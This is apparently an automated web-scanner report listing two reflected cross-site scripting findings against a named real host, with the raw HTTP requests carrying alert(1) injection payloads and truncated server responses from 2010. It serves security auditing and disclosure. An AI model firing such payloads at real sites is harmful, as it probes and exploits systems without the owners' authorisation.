1. Cross-site scripting (reflected)
1.1. http://whitepapers.bx.businessweek.com/ [name of an arbitrarily supplied request parameter]
1.2. http://whitepapers.bx.businessweek.com/ [name of an arbitrarily supplied request parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://whitepapers.bx |
Path: | / |
GET /?5580d'-alert(1)- Host: whitepapers.bx.busin Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 15:27:46 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=m0rqi01gvd Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: 0ca302bedbca35bbd396 Last-Modified: Sat, 20 Nov 2010 15:27:46 GMT Cache-Control: post-check=0, pre-check=0 P3P: CP="ALL DSP NID CUR OUR STP STA" Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <scr' + 'ipt src="http://ad.doubl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://whitepapers.bx |
Path: | / |
GET /?2a757"><script>alert(1)< Host: whitepapers.bx.busin Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 15:27:44 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=ss1ekg3unr Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: 0ca302bedbca35bbd396 Last-Modified: Sat, 20 Nov 2010 15:27:44 GMT Cache-Control: post-check=0, pre-check=0 P3P: CP="ALL DSP NID CUR OUR STP STA" Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="http://ad ...[SNIP]... |